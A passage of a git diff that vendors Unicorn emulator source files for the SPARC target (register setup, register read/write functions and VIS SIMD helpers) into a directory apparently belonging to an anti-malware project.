"regwptr"); +#ifdef TARGET_SPARC64 + tcg_ctx->cpu_xcc = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, xcc), + "xcc"); + tcg_ctx->cpu_asi = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, asi), + "asi"); + tcg_ctx->cpu_fprs = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, fprs), + "fprs"); + + 
if (!uc->init_tcg) + tcg_ctx->cpu_gsr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_gsr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, gsr), + "gsr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_tick_cmpr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_tick_cmpr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, tick_cmpr), + "tick_cmpr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_stick_cmpr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_stick_cmpr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, stick_cmpr), + "stick_cmpr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_hstick_cmpr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_hstick_cmpr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, hstick_cmpr), + "hstick_cmpr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_hintp = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_hintp = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, hintp), + "hintp"); + + if (!uc->init_tcg) + tcg_ctx->cpu_htba = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_htba = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, htba), + "htba"); + + if (!uc->init_tcg) + tcg_ctx->cpu_hver = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_hver = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, hver), + "hver"); + + if (!uc->init_tcg) + tcg_ctx->cpu_ssr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_ssr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, ssr), "ssr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_ver = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_ver = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, version), "ver"); + + tcg_ctx->cpu_softint = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, softint), + "softint"); +#else + if (!uc->init_tcg) + tcg_ctx->cpu_wim = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_wim = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, 
wim), + "wim"); +#endif + + if (!uc->init_tcg) + tcg_ctx->cpu_cond = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_cond = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, cond), + "cond"); + + if (!uc->init_tcg) + tcg_ctx->cpu_cc_src = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_cc_src) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, cc_src), + "cc_src"); + + if (!uc->init_tcg) + tcg_ctx->cpu_cc_src2 = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_cc_src2) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, cc_src2), + "cc_src2"); + + if (!uc->init_tcg) + tcg_ctx->cpu_cc_dst = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_cc_dst = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, cc_dst), + "cc_dst"); + + tcg_ctx->cpu_cc_op = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, cc_op), + "cc_op"); + tcg_ctx->cpu_psr = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, psr), + "psr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_fsr = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_fsr) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, fsr), + "fsr"); + + if (!uc->init_tcg) + tcg_ctx->sparc_cpu_pc = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->sparc_cpu_pc = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, pc), + "pc"); + + if (!uc->init_tcg) + tcg_ctx->cpu_npc = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_npc = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, npc), + "npc"); + + if (!uc->init_tcg) + tcg_ctx->cpu_y = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_y = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, y), "y"); +#ifndef CONFIG_USER_ONLY + if (!uc->init_tcg) + tcg_ctx->cpu_tbr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_tbr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, tbr), + "tbr"); +#endif + if (!uc->init_tcg) { + for (i = 0; i < 8; i++) { + tcg_ctx->cpu_gregs[i] 
= g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_gregs[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, gregs[i]), + gregnames[i]); + } + } + + for (i = 0; i < TARGET_DPREGS; i++) { + tcg_ctx->cpu_fpr[i] = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, fpr[i]), + fregnames[i]); + } + + uc->init_tcg = true; +} + +void restore_state_to_opc(CPUSPARCState *env, TranslationBlock *tb, int pc_pos) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + target_ulong npc; + npc = tcg_ctx->gen_opc_npc[pc_pos]; + if (npc == 1) { + /* dynamic NPC: already stored */ + } else if (npc == 2) { + /* jump PC: use 'cond' and the jump targets of the translation */ + if (env->cond) { + env->npc = tcg_ctx->gen_opc_jump_pc[0]; + } else { + env->npc = tcg_ctx->gen_opc_jump_pc[1]; + } + } else { + env->npc = npc; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.c new file mode 100644 index 0000000..8db2b52 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.c @@ -0,0 +1,151 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/sparc/sparc.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + + +const int SPARC_REGS_STORAGE_SIZE = offsetof(CPUSPARCState, tlb_table); + +static bool sparc_stop_interrupt(int intno) +{ + switch(intno) { + default: + return false; + case TT_ILL_INSN: + return true; + } +} + +static void sparc_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUSPARCState *)uc->current_cpu->env_ptr)->pc = address; + ((CPUSPARCState *)uc->current_cpu->env_ptr)->npc = address + 4; +} + +void sparc_release(void *ctx); +void sparc_release(void *ctx) +{ + int i; + TCGContext *tcg_ctx = (TCGContext *) ctx; + release_common(ctx); + g_free(tcg_ctx->cpu_wim); + g_free(tcg_ctx->cpu_cond); + 
g_free(tcg_ctx->cpu_cc_src); + g_free(tcg_ctx->cpu_cc_src2); + g_free(tcg_ctx->cpu_cc_dst); + g_free(tcg_ctx->cpu_fsr); + g_free(tcg_ctx->sparc_cpu_pc); + g_free(tcg_ctx->cpu_npc); + g_free(tcg_ctx->cpu_y); + g_free(tcg_ctx->cpu_tbr); + + for (i = 0; i < 8; i++) { + g_free(tcg_ctx->cpu_gregs[i]); + } + for (i = 0; i < 32; i++) { + g_free(tcg_ctx->cpu_gpr[i]); + } + + g_free(tcg_ctx->cpu_PC); + g_free(tcg_ctx->btarget); + g_free(tcg_ctx->bcond); + g_free(tcg_ctx->cpu_dspctrl); + + g_free(tcg_ctx->tb_ctx.tbs); +} + +void sparc_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + + memset(env->gregs, 0, sizeof(env->gregs)); + memset(env->fpr, 0, sizeof(env->fpr)); + memset(env->regbase, 0, sizeof(env->regbase)); + + env->pc = 0; + env->npc = 0; + env->regwptr = env->regbase; +} + +int sparc_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.gregs[regid - UC_SPARC_REG_G0]; + else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[regid - UC_SPARC_REG_O0]; + else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[8 + regid - UC_SPARC_REG_L0]; + else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[16 + regid - UC_SPARC_REG_I0]; + else { + switch(regid) { + default: break; + case UC_SPARC_REG_PC: + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.pc; + break; + } + } + } + + return 0; +} + +int sparc_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void 
*value = vals[i]; + if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) + SPARC_CPU(uc, mycpu)->env.gregs[regid - UC_SPARC_REG_G0] = *(uint32_t *)value; + else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) + SPARC_CPU(uc, mycpu)->env.regwptr[regid - UC_SPARC_REG_O0] = *(uint32_t *)value; + else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) + SPARC_CPU(uc, mycpu)->env.regwptr[8 + regid - UC_SPARC_REG_L0] = *(uint32_t *)value; + else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) + SPARC_CPU(uc, mycpu)->env.regwptr[16 + regid - UC_SPARC_REG_I0] = *(uint32_t *)value; + else { + switch(regid) { + default: break; + case UC_SPARC_REG_PC: + SPARC_CPU(uc, mycpu)->env.pc = *(uint32_t *)value; + SPARC_CPU(uc, mycpu)->env.npc = *(uint32_t *)value + 4; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +void sparc_uc_init(struct uc_struct* uc) +{ + register_accel_types(uc); + sparc_cpu_register_types(uc); + leon3_machine_init(uc); + uc->release = sparc_release; + uc->reg_read = sparc_reg_read; + uc->reg_write = sparc_reg_write; + uc->reg_reset = sparc_reg_reset; + uc->set_pc = sparc_set_pc; + uc->stop_interrupt = sparc_stop_interrupt; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.h new file mode 100644 index 0000000..2140f28 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.h @@ -0,0 +1,19 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_SPARC_H +#define UC_QEMU_TARGET_SPARC_H + +// functions to read & write registers +int sparc_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int sparc_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void sparc_reg_reset(struct uc_struct 
*uc); + +void sparc_uc_init(struct uc_struct* uc); +void sparc64_uc_init(struct uc_struct* uc); + +extern const int SPARC_REGS_STORAGE_SIZE; +extern const int SPARC64_REGS_STORAGE_SIZE; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn64.c new file mode 100644 index 0000000..e6f07a3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn64.c @@ -0,0 +1,115 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/sparc/sparc.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + + +const int SPARC64_REGS_STORAGE_SIZE = offsetof(CPUSPARCState, tlb_table); + +static bool sparc_stop_interrupt(int intno) +{ + switch(intno) { + default: + return false; + case TT_ILL_INSN: + return true; + } +} + +static void sparc_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUSPARCState *)uc->current_cpu->env_ptr)->pc = address; + ((CPUSPARCState *)uc->current_cpu->env_ptr)->npc = address + 4; +} + +void sparc_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + + memset(env->gregs, 0, sizeof(env->gregs)); + memset(env->fpr, 0, sizeof(env->fpr)); + memset(env->regbase, 0, sizeof(env->regbase)); + + env->pc = 0; + env->npc = 0; + env->regwptr = env->regbase; +} + +int sparc_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.gregs[regid - UC_SPARC_REG_G0]; + else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[regid - UC_SPARC_REG_O0]; + else if (regid >= UC_SPARC_REG_L0 && regid 
<= UC_SPARC_REG_L7) + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[8 + regid - UC_SPARC_REG_L0]; + else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[16 + regid - UC_SPARC_REG_I0]; + else { + switch(regid) { + default: break; + case UC_SPARC_REG_PC: + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.pc; + break; + } + } + } + + return 0; +} + +int sparc_reg_write(struct uc_struct *uc, unsigned int *regs, void* const* vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) + SPARC_CPU(uc, mycpu)->env.gregs[regid - UC_SPARC_REG_G0] = *(uint64_t *)value; + else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) + SPARC_CPU(uc, mycpu)->env.regwptr[regid - UC_SPARC_REG_O0] = *(uint64_t *)value; + else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) + SPARC_CPU(uc, mycpu)->env.regwptr[8 + regid - UC_SPARC_REG_L0] = *(uint64_t *)value; + else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) + SPARC_CPU(uc, mycpu)->env.regwptr[16 + regid - UC_SPARC_REG_I0] = *(uint64_t *)value; + else { + switch(regid) { + default: break; + case UC_SPARC_REG_PC: + SPARC_CPU(uc, mycpu)->env.pc = *(uint64_t *)value; + SPARC_CPU(uc, mycpu)->env.npc = *(uint64_t *)value + 4; + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +void sparc64_uc_init(struct uc_struct* uc) +{ + register_accel_types(uc); + sparc_cpu_register_types(uc); + sun4u_machine_init(uc); + uc->reg_read = sparc_reg_read; + uc->reg_write = sparc_reg_write; + uc->reg_reset = sparc_reg_reset; + uc->set_pc = sparc_set_pc; + uc->stop_interrupt = sparc_stop_interrupt; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/vis_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/vis_helper.c new file mode 100644 
index 0000000..383cc8b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/vis_helper.c @@ -0,0 +1,489 @@ +/* + * VIS op helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +/* This function uses non-native bit order */ +#define GET_FIELD(X, FROM, TO) \ + ((X) >> (63 - (TO)) & ((1ULL << ((TO) - (FROM) + 1)) - 1)) + +/* This function uses the order in the manuals, i.e. 
bit 0 is 2^0 */ +#define GET_FIELD_SP(X, FROM, TO) \ + GET_FIELD(X, 63 - (TO), 63 - (FROM)) + +target_ulong helper_array8(target_ulong pixel_addr, target_ulong cubesize) +{ + return (GET_FIELD_SP(pixel_addr, 60, 63) << (17 + 2 * cubesize)) | + (GET_FIELD_SP(pixel_addr, 39, 39 + cubesize - 1) << (17 + cubesize)) | + (GET_FIELD_SP(pixel_addr, 17 + cubesize - 1, 17) << 17) | + (GET_FIELD_SP(pixel_addr, 56, 59) << 13) | + (GET_FIELD_SP(pixel_addr, 35, 38) << 9) | + (GET_FIELD_SP(pixel_addr, 13, 16) << 5) | + (((pixel_addr >> 55) & 1) << 4) | + (GET_FIELD_SP(pixel_addr, 33, 34) << 2) | + GET_FIELD_SP(pixel_addr, 11, 12); +} + +#ifdef HOST_WORDS_BIGENDIAN +#define VIS_B64(n) b[7 - (n)] +#define VIS_W64(n) w[3 - (n)] +#define VIS_SW64(n) sw[3 - (n)] +#define VIS_L64(n) l[1 - (n)] +#define VIS_B32(n) b[3 - (n)] +#define VIS_W32(n) w[1 - (n)] +#else +#define VIS_B64(n) b[n] +#define VIS_W64(n) w[n] +#define VIS_SW64(n) sw[n] +#define VIS_L64(n) l[n] +#define VIS_B32(n) b[n] +#define VIS_W32(n) w[n] +#endif + +typedef union { + uint8_t b[8]; + uint16_t w[4]; + int16_t sw[4]; + uint32_t l[2]; + uint64_t ll; + float64 d; +} VIS64; + +typedef union { + uint8_t b[4]; + uint16_t w[2]; + uint32_t l; + float32 f; +} VIS32; + +uint64_t helper_fpmerge(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + + s.ll = src1; + d.ll = src2; + + /* Reverse calculation order to handle overlap */ + d.VIS_B64(7) = s.VIS_B64(3); + d.VIS_B64(6) = d.VIS_B64(3); + d.VIS_B64(5) = s.VIS_B64(2); + d.VIS_B64(4) = d.VIS_B64(2); + d.VIS_B64(3) = s.VIS_B64(1); + d.VIS_B64(2) = d.VIS_B64(1); + d.VIS_B64(1) = s.VIS_B64(0); + /* d.VIS_B64(0) = d.VIS_B64(0); */ + + return d.ll; +} + +uint64_t helper_fmul8x16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * (int32_t)s.VIS_B64(r); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef 
PMUL + + return d.ll; +} + +uint64_t helper_fmul8x16al(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(1) * (int32_t)s.VIS_B64(r); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmul8x16au(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(0) * (int32_t)s.VIS_B64(r); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmul8sux16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * ((int32_t)s.VIS_SW64(r) >> 8); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmul8ulx16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * ((uint32_t)s.VIS_B64(r * 2)); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_W64(r) = tmp >> 8; + + PMUL(0); + PMUL(1); + PMUL(2); + PMUL(3); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmuld8sux16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * ((int32_t)s.VIS_SW64(r) >> 8); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_L64(r) = tmp; + + /* Reverse calculation order to handle overlap */ + PMUL(1); + PMUL(0); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fmuld8ulx16(uint64_t src1, uint64_t src2) +{ + VIS64 s, d; + uint32_t tmp; + + 
s.ll = src1; + d.ll = src2; + +#define PMUL(r) \ + tmp = (int32_t)d.VIS_SW64(r) * ((uint32_t)s.VIS_B64(r * 2)); \ + if ((tmp & 0xff) > 0x7f) { \ + tmp += 0x100; \ + } \ + d.VIS_L64(r) = tmp; + + /* Reverse calculation order to handle overlap */ + PMUL(1); + PMUL(0); +#undef PMUL + + return d.ll; +} + +uint64_t helper_fexpand(uint64_t src1, uint64_t src2) +{ + VIS32 s; + VIS64 d; + + s.l = (uint32_t)src1; + d.ll = src2; + d.VIS_W64(0) = s.VIS_B32(0) << 4; + d.VIS_W64(1) = s.VIS_B32(1) << 4; + d.VIS_W64(2) = s.VIS_B32(2) << 4; + d.VIS_W64(3) = s.VIS_B32(3) << 4; + + return d.ll; +} + +#define VIS_HELPER(name, F) \ + uint64_t name##16(uint64_t src1, uint64_t src2) \ + { \ + VIS64 s, d; \ + \ + s.ll = src1; \ + d.ll = src2; \ + \ + d.VIS_W64(0) = F(d.VIS_W64(0), s.VIS_W64(0)); \ + d.VIS_W64(1) = F(d.VIS_W64(1), s.VIS_W64(1)); \ + d.VIS_W64(2) = F(d.VIS_W64(2), s.VIS_W64(2)); \ + d.VIS_W64(3) = F(d.VIS_W64(3), s.VIS_W64(3)); \ + \ + return d.ll; \ + } \ + \ + uint32_t name##16s(uint32_t src1, uint32_t src2) \ + { \ + VIS32 s, d; \ + \ + s.l = src1; \ + d.l = src2; \ + \ + d.VIS_W32(0) = F(d.VIS_W32(0), s.VIS_W32(0)); \ + d.VIS_W32(1) = F(d.VIS_W32(1), s.VIS_W32(1)); \ + \ + return d.l; \ + } \ + \ + uint64_t name##32(uint64_t src1, uint64_t src2) \ + { \ + VIS64 s, d; \ + \ + s.ll = src1; \ + d.ll = src2; \ + \ + d.VIS_L64(0) = F(d.VIS_L64(0), s.VIS_L64(0)); \ + d.VIS_L64(1) = F(d.VIS_L64(1), s.VIS_L64(1)); \ + \ + return d.ll; \ + } \ + \ + uint32_t name##32s(uint32_t src1, uint32_t src2) \ + { \ + VIS32 s, d; \ + \ + s.l = src1; \ + d.l = src2; \ + \ + d.l = F(d.l, s.l); \ + \ + return d.l; \ + } + +#define FADD(a, b) ((a) + (b)) +#define FSUB(a, b) ((a) - (b)) +VIS_HELPER(helper_fpadd, FADD) +VIS_HELPER(helper_fpsub, FSUB) + +#define VIS_CMPHELPER(name, F) \ + uint64_t name##16(uint64_t src1, uint64_t src2) \ + { \ + VIS64 s, d; \ + \ + s.ll = src1; \ + d.ll = src2; \ + \ + d.VIS_W64(0) = F(s.VIS_W64(0), d.VIS_W64(0)) ? 
1 : 0; \ + d.VIS_W64(0) |= F(s.VIS_W64(1), d.VIS_W64(1)) ? 2 : 0; \ + d.VIS_W64(0) |= F(s.VIS_W64(2), d.VIS_W64(2)) ? 4 : 0; \ + d.VIS_W64(0) |= F(s.VIS_W64(3), d.VIS_W64(3)) ? 8 : 0; \ + d.VIS_W64(1) = d.VIS_W64(2) = d.VIS_W64(3) = 0; \ + \ + return d.ll; \ + } \ + \ + uint64_t name##32(uint64_t src1, uint64_t src2) \ + { \ + VIS64 s, d; \ + \ + s.ll = src1; \ + d.ll = src2; \ + \ + d.VIS_L64(0) = F(s.VIS_L64(0), d.VIS_L64(0)) ? 1 : 0; \ + d.VIS_L64(0) |= F(s.VIS_L64(1), d.VIS_L64(1)) ? 2 : 0; \ + d.VIS_L64(1) = 0; \ + \ + return d.ll; \ + } + +#define FCMPGT(a, b) ((a) > (b)) +#define FCMPEQ(a, b) ((a) == (b)) +#define FCMPLE(a, b) ((a) <= (b)) +#define FCMPNE(a, b) ((a) != (b)) + +VIS_CMPHELPER(helper_fcmpgt, FCMPGT) +VIS_CMPHELPER(helper_fcmpeq, FCMPEQ) +VIS_CMPHELPER(helper_fcmple, FCMPLE) +VIS_CMPHELPER(helper_fcmpne, FCMPNE) + +uint64_t helper_pdist(uint64_t sum, uint64_t src1, uint64_t src2) +{ + int i; + for (i = 0; i < 8; i++) { + int s1, s2; + + s1 = (src1 >> (56 - (i * 8))) & 0xff; + s2 = (src2 >> (56 - (i * 8))) & 0xff; + + /* Absolute value of difference. */ + s1 -= s2; + if (s1 < 0) { + s1 = -s1; + } + + sum += s1; + } + + return sum; +} + +uint32_t helper_fpack16(uint64_t gsr, uint64_t rs2) +{ + int scale = (gsr >> 3) & 0xf; + uint32_t ret = 0; + int byte; + + for (byte = 0; byte < 4; byte++) { + uint32_t val; + int16_t src = rs2 >> (byte * 16); + int32_t scaled = src << scale; + int32_t from_fixed = scaled >> 7; + + val = (from_fixed < 0 ? 0 : + from_fixed > 255 ? 255 : from_fixed); + + ret |= val << (8 * byte); + } + + return ret; +} + +uint64_t helper_fpack32(uint64_t gsr, uint64_t rs1, uint64_t rs2) +{ + int scale = (gsr >> 3) & 0x1f; + uint64_t ret = 0; + int word; + + ret = (rs1 << 8) & ~(0x000000ff000000ffULL); + for (word = 0; word < 2; word++) { + uint64_t val; + int32_t src = rs2 >> (word * 32); + int64_t scaled = (int64_t)src << scale; + int64_t from_fixed = scaled >> 23; + + val = (from_fixed < 0 ? 0 : + (from_fixed > 255) ? 
255 : from_fixed); + + ret |= val << (32 * word); + } + + return ret; +} + +uint32_t helper_fpackfix(uint64_t gsr, uint64_t rs2) +{ + int scale = (gsr >> 3) & 0x1f; + uint32_t ret = 0; + int word; + + for (word = 0; word < 2; word++) { + uint32_t val; + int32_t src = rs2 >> (word * 32); + int64_t scaled = src << scale; + int64_t from_fixed = scaled >> 16; + + val = (from_fixed < -32768 ? -32768 : + from_fixed > 32767 ? 32767 : from_fixed); + + ret |= (val & 0xffff) << (word * 16); + } + + return ret; +} + +uint64_t helper_bshuffle(uint64_t gsr, uint64_t src1, uint64_t src2) +{ + union { + uint64_t ll[2]; + uint8_t b[16]; + } s; + VIS64 r; + uint32_t i, mask, host; + + /* Set up S such that we can index across all of the bytes. */ +#ifdef HOST_WORDS_BIGENDIAN + s.ll[0] = src1; + s.ll[1] = src2; + host = 0; +#else + s.ll[1] = src1; + s.ll[0] = src2; + host = 15; +#endif + mask = gsr >> 32; + + for (i = 0; i < 8; ++i) { + unsigned e = (mask >> (28 - i*4)) & 0xf; + r.VIS_B64(i) = s.b[e ^ host]; + } + + return r.ll; +} diff --git 